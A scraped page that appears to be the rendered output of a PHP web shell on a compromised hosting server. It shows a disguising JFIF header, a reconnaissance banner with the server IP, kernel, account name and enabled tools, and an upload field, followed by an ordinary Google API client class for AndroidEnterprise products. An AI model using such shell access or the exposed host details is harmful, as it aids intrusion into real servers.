����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.147.74.90 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/AndroidEnterprise/ |
Upload File : |
<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Service\AndroidEnterprise; class Product extends \Google\Collection { protected $collection_key = 'screenshotUrls'; protected $appTracksType = TrackInfo::class; protected $appTracksDataType = 'array'; protected $appVersionType = AppVersion::class; protected $appVersionDataType = 'array'; public $authorName; public $availableCountries; public $availableTracks; public $category; public $contentRating; public $description; public $detailsUrl; public $distributionChannel; public $features; public $iconUrl; public $lastUpdatedTimestampMillis; public $minAndroidSdkVersion; protected $permissionsType = ProductPermission::class; protected $permissionsDataType = 'array'; public $productId; public $productPricing; public $recentChanges; public $requiresContainerApp; public $screenshotUrls; protected $signingCertificateType = ProductSigningCertificate::class; protected $signingCertificateDataType = ''; public $smallIconUrl; public $title; public $workDetailsUrl; /** * @param TrackInfo[] */ public function setAppTracks($appTracks) { $this->appTracks = $appTracks; } /** * @return TrackInfo[] */ public function getAppTracks() { return $this->appTracks; } /** * @param AppVersion[] */ public function setAppVersion($appVersion) { $this->appVersion = $appVersion; } /** * @return AppVersion[] */ public function getAppVersion() { return $this->appVersion; } public function setAuthorName($authorName) { $this->authorName = $authorName; } public function getAuthorName() { return $this->authorName; } public function setAvailableCountries($availableCountries) { $this->availableCountries = $availableCountries; } public function getAvailableCountries() { return $this->availableCountries; } public function setAvailableTracks($availableTracks) { $this->availableTracks = $availableTracks; } public function getAvailableTracks() { return $this->availableTracks; } public function setCategory($category) { $this->category = $category; } public function getCategory() { return $this->category; } public function setContentRating($contentRating) { $this->contentRating = $contentRating; } public function getContentRating() { return $this->contentRating; } public function setDescription($description) { $this->description = $description; } public function getDescription() { return $this->description; } public function setDetailsUrl($detailsUrl) { $this->detailsUrl = $detailsUrl; } public function getDetailsUrl() { return $this->detailsUrl; } public function setDistributionChannel($distributionChannel) { $this->distributionChannel = $distributionChannel; } public function getDistributionChannel() { return $this->distributionChannel; } public function setFeatures($features) { $this->features = $features; } public function getFeatures() { return $this->features; } public function setIconUrl($iconUrl) { $this->iconUrl = $iconUrl; } public function getIconUrl() { return $this->iconUrl; } public function setLastUpdatedTimestampMillis($lastUpdatedTimestampMillis) { $this->lastUpdatedTimestampMillis = $lastUpdatedTimestampMillis; } public function getLastUpdatedTimestampMillis() { return $this->lastUpdatedTimestampMillis; } public function setMinAndroidSdkVersion($minAndroidSdkVersion) { $this->minAndroidSdkVersion = $minAndroidSdkVersion; } public function getMinAndroidSdkVersion() { return $this->minAndroidSdkVersion; } /** * @param ProductPermission[] */ public function setPermissions($permissions) { $this->permissions = $permissions; } /** * @return ProductPermission[] */ public function getPermissions() { return $this->permissions; } public function setProductId($productId) { $this->productId = $productId; } public function getProductId() { return $this->productId; } public function setProductPricing($productPricing) { $this->productPricing = $productPricing; } public function getProductPricing() { return $this->productPricing; } public function setRecentChanges($recentChanges) { $this->recentChanges = $recentChanges; } public function getRecentChanges() { return $this->recentChanges; } public function setRequiresContainerApp($requiresContainerApp) { $this->requiresContainerApp = $requiresContainerApp; } public function getRequiresContainerApp() { return $this->requiresContainerApp; } public function setScreenshotUrls($screenshotUrls) { $this->screenshotUrls = $screenshotUrls; } public function getScreenshotUrls() { return $this->screenshotUrls; } /** * @param ProductSigningCertificate */ public function setSigningCertificate(ProductSigningCertificate $signingCertificate) { $this->signingCertificate = $signingCertificate; } /** * @return ProductSigningCertificate */ public function getSigningCertificate() { return $this->signingCertificate; } public function setSmallIconUrl($smallIconUrl) { $this->smallIconUrl = $smallIconUrl; } public function getSmallIconUrl() { return $this->smallIconUrl; } public function setTitle($title) { $this->title = $title; } public function getTitle() { return $this->title; } public function setWorkDetailsUrl($workDetailsUrl) { $this->workDetailsUrl = $workDetailsUrl; } public function getWorkDetailsUrl() { return $this->workDetailsUrl; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Product::class, 'Google_Service_AndroidEnterprise_Product');